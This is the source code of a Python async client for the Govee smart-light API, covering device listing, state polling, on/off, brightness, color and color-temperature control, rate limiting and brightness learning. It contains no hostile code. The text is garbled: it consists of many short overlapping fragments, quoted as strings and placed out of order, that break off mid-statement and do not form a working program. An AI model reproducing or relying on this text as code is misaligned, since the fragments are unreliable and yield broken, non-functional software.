\"\"\" self._config_offline_is_off = val @property def devices(self)", "\"\"\"Set color temperature to 2000-9000.\"\"\" success = False err = None device_str, device", "= int((time.time() - start) * 1000) if response.status == 200: if \"Pong\" ==", "False prop_color = (0, 0, 0) prop_color_temp = 0 for prop in json_obj[\"data\"][\"properties\"]:", "= self._devices[device_str] elif seconds_locked: # we just changed something, return state from history", "events import Events from typing import Any, List, Optional, Tuple, Union import aiohttp", "seconds_lock = 0 return seconds_lock async def _control( self, device: Union[str, GoveeDevice], command:", "device = self._get_device(device) cmd = {\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result", "must be within 0 .. 254\" ) elif green < 0 or green", "if not online: # show all devices as offline for device in self.devices:", "self._session.get( url=url, headers=self._getHeaders(auth), params=params ) ) as response: yield response @asynccontextmanager async def", "assumption, as we didn't get anything higher ) if prop_brightness > 100: device.learned_get_brightness_max", "learned/configured values if device_str in learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max", "\"colorTem\" result, err = await self._control(device, command, color_temp) if not err: success =", "= None _LOGGER.debug( f\"state returned from API: {json_obj}, resulting state object: {result}\" )", "response.headers and _RATELIMIT_RESET in response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING])", "learning option prop_power_state = False # autobrightness learning if device.learned_get_brightness_max == None or", "async def create( cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): 
\"\"\"Use", "success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color =", "repr(ex) except Exception as ex: err = \"unknown error: %s\" % repr(ex) if", "= f\"API-Error {response.status} on command {cmd}: {text} for device {device}\" _LOGGER.warning(f\"control {device_str} not", "err = await self._control(device, command, brightness_set) if err: # try again with 0-100", "\"\"\"Check connection to API.\"\"\" try: # this will set self.online await self.ping() except:", "cmd = {\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result = None err", "= self._get_device(device) return device @property def online(self): \"\"\"Last request was able to connect", "@property def rate_limit_reset(self): \"\"\"UTC time in seconds when the rate limit will be", ") if val < 1: raise GoveeError(f\"Rate limiter threshold {val} must be above", "brightness_result = brightness_result_100 result, err = await self._control( device, command, brightness_set ) if", "@asynccontextmanager async def _api_put(self, *, auth=True, url: str, json): \"\"\"API HTTP Put call.\"\"\"", "{device_str}, {device}\" else: if len(color) != 3: err = f\"set_color: invalid value {color},", "Govee(object): \"\"\"Govee API client.\"\"\" async def __aenter__(self): \"\"\"Async context manager enter.\"\"\" self._session =", "temperature to 2000-9000.\"\"\" success = False err = None device_str, device = self._get_device(device)", "lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result = await response.text() err =", "== 200: device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow()", "= None 
learned_get_brightness_max = None before_set_brightness_turn_on = False config_offline_is_off = False # effenctive", "await self._control(device, command, color_temp) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp", "Put call.\"\"\" async with self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json ) ) as", "set_color_temp( self, device: Union[str, GoveeDevice], color_temp: int ) -> Tuple[bool, str]: \"\"\"Set color", "GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object):", "seconds\" ) else: params = {\"device\": device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params)", "= False if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow", "self._session = None def __init__( self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None,", "must be within 0 .. 
254\" elif blue < 0 or blue >", "Any, List, Optional, Tuple, Union import aiohttp from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage", "response.status == 200: result = await response.json() timestamp = self._utcnow() learning_infos = await", "GoveeError(f\"Rate limiter threshold {val} must be above 1\") self._rate_limit_on = val @property def", "try: # this will set self.online await self.ping() except: pass return self.online async", "return success, err async def _learn(self, device): \"\"\"Persist learned information from device DTO.\"\"\"", "If the brightness slider doesn't match the actual brightness pull the brightness up", "are online self.events = Events() self._api_key = api_key self._devices = {} self._rate_limit_on =", "brightness_result self._devices[device_str].power_state = brightness_result > 0 return success, err async def _learn(self, device):", "int) -> int: \"\"\"Get seconds to wait.\"\"\" seconds_lock = utcSeconds - self._utcnow() if", "timestamp result.source = \"api\" result.error = None _LOGGER.debug( f\"state returned from API: {json_obj},", "-> Tuple[bool, str]: \"\"\"Set color temperature to 2000-9000.\"\"\" success = False err =", "information from device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed", "VERSION) self._online = True # assume we are online self.events = Events() self._api_key", "until the rate limit will be reset.\"\"\" return self._limit_reset - self._utcnow() @property def", "blue < 0 or blue > 255: err = f\"set_color: invalid value {color},", "= f\"Invalid device {device_str}, {device}\" else: if brightness < 0 or brightness >", "prop_brightness * 254 / 100 ) result = self._devices[device_str] result.online = prop_online result.power_state", "device if learning_infos == None: learning_infos = {} if device.device not in learning_infos:", "success = False err = None device_str, device = self._get_device(device) if not 
device:", "a device by address or GoveeDevice DTO. returns: device_address, device_dto \"\"\" device_str =", "limit_unknown: self._limit_remaining -= 1 async def rate_limit_delay(self): \"\"\"Delay a call when rate limiting", "\"\"\"Ping the api endpoint. No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay", "{val} must be above 1\") self._rate_limit_on = val @property def config_offline_is_off(self): \"\"\"Get the", "= 0 for prop in json_obj[\"data\"][\"properties\"]: # somehow these are all dicts with", "option prop_power_state = False # autobrightness learning if device.learned_get_brightness_max == None or (", "@property def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst = [] for dev", "err async def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices", ".. 254\" ) elif green < 0 or green > 255: err =", "False elif device.config_offline_is_off: # learning option prop_power_state = False # autobrightness learning if", "-> Tuple[bool, str]: \"\"\"Set color (r, g, b) where each value may be", "2000 or color_temp > 9000: err = f\"set_color_temp: invalid value {color_temp}, allowed range", "def rate_limit_total(self): \"\"\"Rate limit is counted down from this value.\"\"\" return self._limit @property", "await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str = item[\"model\"] is_retrievable", "= await self._control( device, command, brightness_set ) if not err: device.learned_set_brightness_max = 100", "run. # we will need to re-learn every time again. self._learning_storage = GoveeAbstractLearningStorage()", "if self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off: # learning option prop_power_state = False", "do we have requests left? 
if self.rate_limit_remaining <= self.rate_limit_on: # do we need", "with self._api_get(url=_API_PING, auth=False) as response: result = await response.text() delay = int((time.time() -", "self._devices[device_str].power_state = brightness_result > 0 return success, err async def _learn(self, device): \"\"\"Persist", "result, err async def get_states(self) -> List[GoveeDevice]: \"\"\"Request states for all devices from", "device.learned_get_brightness_max = ( 100 # assumption, as we didn't get anything higher )", "device %s uses range 0-%s for getting brightness state.\", device.device, device.learned_get_brightness_max, ) if", "limiter threshold {val} must be above 1\") self._rate_limit_on = val @property def config_offline_is_off(self):", "the brightness slider doesn't match the actual brightness pull the brightness up to", "\"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\" async def __aenter__(self): \"\"\"Async context", "int, int] color_temp: int timestamp: int source: str error: str lock_set_until: int lock_get_until:", "= prop_color result.color_temp = prop_color_temp result.timestamp = timestamp result.source = \"api\" result.error =", "if changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device: Union[str, GoveeDevice], color_temp: int", "100 / 254)) brightness_result_100 = math.ceil(brightness_set_100 * 254 / 100) if device.learned_set_brightness_max ==", "learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create device", "from API: {json_obj}, resulting state object: {result}\" ) else: errText = await response.text()", "True elif \"powerState\" in prop: prop_power_state = prop[\"powerState\"] == \"on\" elif \"brightness\" in", "are finished with the Client without using an async context 
manager.\"\"\" await self.__aexit__()", "a device, return success and error message.\"\"\" return await self._turn(device, \"on\") async def", "unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\" async def __aenter__(self): \"\"\"Async context manager enter.\"\"\"", "int timestamp: int source: str error: str lock_set_until: int lock_get_until: int learned_set_brightness_max: int", "is locked for {seconds_locked} seconds. Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\":", "Request headers with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager async", "aiohttp.ClientError as ex: # we are offline self._set_online(False) err = \"error from aiohttp:", "brightness as 0..254 brightness_set = brightness brightness_result = brightness_set brightness_set_100 = 0 if", "\"powerState\" in prop: prop_power_state = prop[\"powerState\"] == \"on\" elif \"brightness\" in prop: prop_brightness", "< 1: raise GoveeError(f\"Rate limiter threshold {val} must be above 1\") self._rate_limit_on =", "in device.support_cmds: err = f\"Command {command} not possible on device {device.device}\" _LOGGER.warning(f\"control {device_str}", "= self._get_lock_seconds(device.lock_get_until) if not device: err = f\"Invalid device {device_str}\" elif not device.retrievable:", "\"learned device %s uses range 0-%s for getting brightness state.\", device.device, device.learned_get_brightness_max, )", "\"\"\" success = False err = None device_str, device = self._get_device(device) if not", "0, 0) prop_color_temp = 0 for prop in json_obj[\"data\"][\"properties\"]: # somehow these are", "element if \"online\" in prop: prop_online = prop[\"online\"] is True elif \"powerState\" in", "for n seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not", "brightness_set_100 = max(1, math.floor(brightness * 100 / 254)) brightness_result_100 = math.ceil(brightness_set_100 * 254", "%s\" % 
repr(ex) except Exception as ex: err = \"unknown error: %s\" %", "self._online = True # assume we are online self.events = Events() self._api_key =", "close when your are finished with the Client without using an async context", "val < 1: raise GoveeError(f\"Rate limiter threshold {val} must be above 1\") self._rate_limit_on", "or color_temp > 9000: err = f\"set_color_temp: invalid value {color_temp}, allowed range 2000-9000\"", "__init__( self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with an", "device.device ].set_brightness_max = device.learned_set_brightness_max changed = True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ):", "False config_offline_is_off = False # effenctive state # defaults by some conditions if", "5 # safe available call count for multiple processes self._limit = 100 self._limit_remaining", "doesn't match the actual brightness pull the brightness up to max once.\", device.device,", "color_temp > 9000: err = f\"set_color_temp: invalid value {color_temp}, allowed range 2000-9000\" else:", "else: _LOGGER.debug(f\"unknown state property '{prop}'\") if not prop_online: if self.config_offline_is_off is not None:", "= self._get_device(device) result = None err = None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not", "math.floor(brightness * 100 / 254)) brightness_result_100 = math.ceil(brightness_set_100 * 254 / 100) if", "by turn_on and turn_off.\"\"\" success = False err = None device_str, device =", "= device if isinstance(device, GoveeDevice): device_str = device.device if not device_str in self._devices:", "state for one specific device.\"\"\" device_str, device = self._get_device(device) result = None err", "result = None err = None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device: err", "maximum number of requests you're permitted to make per minute. 
_RATELIMIT_REMAINING = \"Rate-Limit-Remaining\"", "self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the remaining calls that trigger rate limiting.\"\"\"", "when your are finished with the Client without using an async context manager.\"\"\"", "await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device: Union[str, GoveeDevice], color_temp: int ) ->", "( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else:", "prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown", "str]: \"\"\"Turn off a device, return success and error message.\"\"\" return await self._turn(device,", ") else: errText = await response.text() err = f\"API-Error {response.status}: {errText}\" return result,", "device.learned_get_brightness_max == 100: # scale range 0-100 up to 0-254 prop_brightness = math.floor(", "True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked for", "= await response.text() err = f\"API-Error {response.status}: {result}\" return ping_ok_delay, err async def", "self.rate_limit_remaining <= self.rate_limit_on: # do we need to sleep? sleep_sec = self.rate_limit_reset_seconds if", "calls. 
This also handles: - rate-limiting - online/offline status \"\"\" err = None", "# safe available call count for multiple processes self._limit = 100 self._limit_remaining =", "url: str, params=None): \"\"\"API HTTP Get call.\"\"\" async with self._api_request_internal( lambda: self._session.get( url=url,", "to get utc now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate", "\"\"\"Set color (r, g, b) where each value may be in range 0-255", "if device.learned_get_brightness_max == 100: # scale range 0-100 up to 0-254 prop_brightness =", "utilize the govee API\" ) limit_unknown = True if ( _RATELIMIT_TOTAL in response.headers", "aiohttp result checks if it is a success result.\"\"\" return \"message\" in result", "class GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class", "value {color}, green must be within 0 .. 254\" elif blue < 0", "= GoveeAbstractLearningStorage() @classmethod async def create( cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] =", "for other clients. 
\"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the remaining", "= color[0] green = color[1] blue = color[2] if red < 0 or", "self._devices[device_str].source = \"history\" self._devices[device_str].color = color return success, err def _get_lock_seconds(self, utcSeconds: int)", "*err): \"\"\"Async context manager exit.\"\"\" if self._session: await self._session.close() self._session = None def", "= self._utcnow() learning_infos = await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str = item[\"device\"]", "is_retrievable = item[\"retrievable\"] # assuming defaults for learned/configured values learned_set_brightness_max = None learned_get_brightness_max", "# Unsupported Cmd Value # set brightness as 0..100 as 0..254 didn't work", "err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color", "GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off a device, return success and error message.\"\"\"", "Union[str, GoveeDevice], onOff: str ) -> Tuple[bool, str]: \"\"\"Turn command called by turn_on", "- rate-limiting - online/offline status \"\"\" err = None await self.rate_limit_delay() try: async", "0 .. 
254\" else: if brightness > 0 and device.before_set_brightness_turn_on: await self.turn_on(device) #", "= self._devices[device_str] result.online = prop_online result.power_state = prop_power_state result.brightness = prop_brightness result.color =", "bool support_cmds: List[str] support_turn: bool support_brightness: bool support_color: bool support_color_tem: bool online: bool", "or red > 255: err = ( f\"set_color: invalid value {color}, red must", "self._devices[device_str].error = err else: self._devices[device_str] = state self._devices[device_str].error = None return self.devices async", "onOff: str ) -> Tuple[bool, str]: \"\"\"Turn command called by turn_on and turn_off.\"\"\"", "> 100: device.learned_get_brightness_max = 254 await self._learn(device) if device.learned_get_brightness_max == 100: # scale", "total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False except Exception", "if val < 1: raise GoveeError(f\"Rate limiter threshold {val} must be above 1\")", "GoveeDevice], color_temp: int ) -> Tuple[bool, str]: \"\"\"Set color temperature to 2000-9000.\"\"\" success", "= utcSeconds - self._utcnow() if seconds_lock < 0: seconds_lock = 0 return seconds_lock", "support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], #", "err = f\"Invalid device {device_str}, {device}\" else: if len(color) != 3: err =", "as response: if response.status == 200: timestamp = self._utcnow() json_obj = await response.json()", "self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off: # learning option prop_power_state = False #", "err = None device_str, device = self._get_device(device) if not device: err = f\"Invalid", "\"brightness\" in prop: prop_brightness = prop[\"brightness\"] elif \"color\" in prop: prop_color = (", 
"err) def _utcnow(self): \"\"\"Helper method to get utc now as seconds.\"\"\" return datetime.timestamp(datetime.now())", "Client without an async context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return", "def _track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if response.status == 429: _LOGGER.warning( f\"Rate limit", "context manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return Request headers with/without authentication.\"\"\"", "err: # Unsupported Cmd Value # set brightness as 0..100 as 0..254 didn't", "ex: _LOGGER.warning(f\"Error trying to get rate limits: {ex}\") if limit_unknown: self._limit_remaining -= 1", "async def get_states(self) -> List[GoveeDevice]: \"\"\"Request states for all devices from API.\"\"\" _LOGGER.debug(\"get_states\")", "{self._limit_remaining} of {self._limit} remaining, sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def rate_limit_total(self):", "else: if not device.controllable: err = f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control {device_str}", "= 0 if brightness_set > 0: brightness_set_100 = max(1, math.floor(brightness * 100 /", "set brightness as 0..100 brightness_set = brightness_set_100 brightness_result = brightness_result_100 command = \"brightness\"", "= \"colorTem\" result, err = await self._control(device, command, color_temp) if not err: success", "== None or ( device.learned_get_brightness_max == 100 and prop_brightness > 100 ): device.learned_get_brightness_max", "count for multiple processes self._limit = 100 self._limit_remaining = 100 self._limit_reset = 0", "{sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit is counted down from", "err = f\"Command {command} not possible on device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible:", "get_states(self) -> List[GoveeDevice]: \"\"\"Request 
states for all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str", "params: Any ) -> Tuple[Any, str]: \"\"\"Control led strips and bulbs.\"\"\" device_str, device", "f\"Invalid device {device_str}, {device}\" else: command = \"turn\" params = onOff result, err", "{device.device} is not controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\") elif not command in", "= GoveeLearnedInfo() # output what was lerned, and learn if ( learning_infos[device.device].set_brightness_max !=", "None: default, use config_offline_is_off from learning, or False by default. False: an offline", "# we just changed something, return state from history self._devices[device_str].source = \"history\" result", "online # inform about state change self.events.online(self._online) if not online: # show all", "Exception as ex: err = \"unknown error: %s\" % repr(ex) if err: class", "{seconds_locked} seconds. Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\": device.model,", "\"on\") async def turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off a", "command called by turn_on and turn_off.\"\"\" success = False err = None device_str,", "{device}\" else: if brightness < 0 or brightness > 254: err = f\"set_brightness:", ") if not err: device.learned_set_brightness_max = 100 await self._learn(device) else: if brightness_set >", "GoveeDevice], color: Tuple[int, int, int] ) -> Tuple[bool, str]: \"\"\"Set color (r, g,", "f\"Rate limiter threshold {val} must be below {self._limit}\" ) if val < 1:", "str]: \"\"\"Set brightness to 0-254.\"\"\" success = False err = None device_str, device", "response: self._set_online(True) # we got something, so we are online self._track_rate_limit(response) # return", "will need to re-learn every time again. 
self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def", "call.\"\"\" async with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params ) ) as response:", "\"\"\"Get a device by address or GoveeDevice DTO. returns: device_address, device_dto \"\"\" device_str", "Tuple[int, int, int] ) -> Tuple[bool, str]: \"\"\"Set color (r, g, b) where", "device.model, \"cmd\": cmd} await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response:", "_LOGGER.debug( f\"state returned from API: {json_obj}, resulting state object: {result}\" ) else: errText", "self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with an API_KEY", "err = f\"Invalid device {device_str}\" elif not device.retrievable: # device {device_str} isn't able", "prop_brightness > 100: device.learned_get_brightness_max = 254 await self._learn(device) if device.learned_get_brightness_max == 100: #", "{result}\" ) else: errText = await response.text() err = f\"API-Error {response.status}: {errText}\" return", "3: err = f\"set_color: invalid value {color}, must be tuple with (r, g,", "self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response: if response.status == 200:", "success and error message.\"\"\" return await self._turn(device, \"on\") async def turn_off(self, device: Union[str,", "return state from hisory for n seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS =", "checks if it is a success result.\"\"\" return \"message\" in result and result[\"message\"]", "limit.\"\"\" return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time in seconds when the rate", "err = await self._control(device, command, params) success = False if not err: success", "self._track_rate_limit(response) # return the async content manager response yield response except 
aiohttp.ClientError as", "device {device_str} isn't able to return state, return 'history' state self._devices[device_str].source = \"history\"", "brightness_set > 0: brightness_set_100 = max(1, math.floor(brightness * 100 / 254)) brightness_result_100 =", "{color}, green must be within 0 .. 254\" elif blue < 0 or", "sleep await asyncio.sleep(1) # set brightness as 0..254 brightness_set = brightness brightness_result =", "green, \"b\": blue} result, err = await self._control(device, command, command_color) if not err:", "power_state: bool brightness: int color: Tuple[int, int, int] color_temp: int timestamp: int source:", "Defaults to 5, which means there is some room for other clients. \"\"\"", "= False prop_color = (0, 0, 0) prop_color_temp = 0 for prop in", "= False # init Dict and entry for device if learning_infos == None:", "0-%s for getting brightness state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100: _LOGGER.info(", "max once.\", device.device, ) changed = True learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if", "self._devices[device_str] _LOGGER.debug( f\"state object returned from cache: {result}, next state for {device.device} from", "api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with an API_KEY and", "power state. True: an offline device is shown as off. 
\"\"\" self._config_offline_is_off =", "self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self, result) -> bool: \"\"\"Given", "self._set_online(True) # we got something, so we are online self._track_rate_limit(response) # return the", "url=_API_DEVICES_CONTROL, json=json ) as response: if response.status == 200: device.lock_set_until = ( self._utcnow()", "{\"device\": device.device, \"model\": device.model, \"cmd\": cmd} await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json", "].get_brightness_max = device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device: Union[str,", "_get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a device by address or", "self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls that trigger rate limiting. Defaults to 5,", "= max(1, math.floor(brightness * 100 / 254)) brightness_result_100 = math.ceil(brightness_set_100 * 254 /", "elif not device.retrievable: # device {device_str} isn't able to return state, return 'history'", "url: str, json): \"\"\"API HTTP Put call.\"\"\" async with self._api_request_internal( lambda: self._session.put( url=url,", "rate_limit_total(self): \"\"\"Rate limit is counted down from this value.\"\"\" return self._limit @property def", "brightness as 0..100 as 0..254 didn't work brightness_set = brightness_set_100 brightness_result = brightness_result_100", "_API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\" # API rate limit header", "response: yield response @asynccontextmanager async def _api_get(self, *, auth=True, url: str, params=None): \"\"\"API", "rate limit will be reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until the", "100 self._limit_remaining = 100 
self._limit_reset = 0 self._config_offline_is_off = None self._learning_storage = learning_storage", "color_temp: int timestamp: int source: str error: str lock_set_until: int lock_get_until: int learned_set_brightness_max:", "# api doesn't work if we don't sleep await asyncio.sleep(1) # set brightness", "connection to API.\"\"\" try: # this will set self.online await self.ping() except: pass", "# defaults for state online=True, power_state=False, brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\",", "self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\" else: if len(color)", "\"\"\"Single device from cache.\"\"\" _, device = self._get_device(device) return device @property def online(self):", "await asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\": device.model, \"cmd\": cmd} await self.rate_limit_delay() async", "= f\"set_color_temp: invalid value {color_temp}, allowed range 2000-9000\" else: command = \"colorTem\" result,", "change power state. True: an offline device is shown as off. \"\"\" self._config_offline_is_off", "device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for setting brightness.\", device.device,", "\"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status == 200: timestamp", "state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range for %s", "= \"unknown error: %s\" % repr(ex) if err: class error_response: def __init__(self, err_msg):", "_LOGGER.debug(f\"control {device_str} not possible: {err}\") elif not command in device.support_cmds: err = f\"Command", "# The maximum number of requests you're permitted to make per minute. 
_RATELIMIT_REMAINING", "learning_storage if not self._learning_storage: # use an internal learning storage as long as", "sleep_sec = self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of", "{val} must be below {self._limit}\" ) if val < 1: raise GoveeError(f\"Rate limiter", "response.text() err = f\"API-Error {response.status} on command {cmd}: {text} for device {device}\" _LOGGER.warning(f\"control", "False # autobrightness learning if device.learned_get_brightness_max == None or ( device.learned_get_brightness_max == 100", "self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp return success, err async def set_color( self,", "\"turn\" params = onOff result, err = await self._control(device, command, params) success =", "color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result", "changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device: Union[str, GoveeDevice], color_temp: int )", "async context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self async def", "we run. # we will need to re-learn every time again. 
self._learning_storage =", "getting state for device %s: %s\", device_str, err, ) self._devices[device_str].error = err else:", "DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"],", "self._devices[device_str].error = None return self.devices async def _get_device_state( self, device: Union[str, GoveeDevice] )", "if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range for %s is assumed. If the", "params) success = False if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp", "*, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create method if you want to", "model_str = item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming defaults for learned/configured values learned_set_brightness_max", "device: Union[str, GoveeDevice], color_temp: int ) -> Tuple[bool, str]: \"\"\"Set color temperature to", "as ex: # we are offline self._set_online(False) err = \"error from aiohttp: %s\"", "self.online await self.ping() except: pass return self.online async def ping(self) -> Tuple[float, str]:", "command, params) success = False if not err: success = self._is_success_result_message(result) if success:", "return success, err async def set_brightness( self, device: Union[str, GoveeDevice], brightness: int )", "if auth: return {\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager async def _api_put(self, *, auth=True,", "self._session.put( url=url, headers=self._getHeaders(auth), json=json ) ) as response: yield response @asynccontextmanager async def", "in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for state online=True,", "or brightness > 254: err = 
f\"set_brightness: invalid value {brightness}, allowed range 0", "self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\" Set global behavour when device is", "devices also utilize the govee API\" ) limit_unknown = True if ( _RATELIMIT_TOTAL", "time.time() ping_ok_delay = None err = None async with self._api_get(url=_API_PING, auth=False) as response:", "n seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object): \"\"\"", "100 self._limit_reset = 0 self._config_offline_is_off = None self._learning_storage = learning_storage if not self._learning_storage:", "delay) else: err = f\"API-Result wrong: {result}\" else: result = await response.text() err", "devices return self.devices, err def _get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get", "it is a success result.\"\"\" return \"message\" in result and result[\"message\"] == \"Success\"", "utcSeconds: int) -> int: \"\"\"Get seconds to wait.\"\"\" seconds_lock = utcSeconds - self._utcnow()", "params = {\"device\": device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if", "not controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\") elif not command in device.support_cmds: err", "- online/offline status \"\"\" err = None await self.rate_limit_delay() try: async with request_lambda()", "return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property def 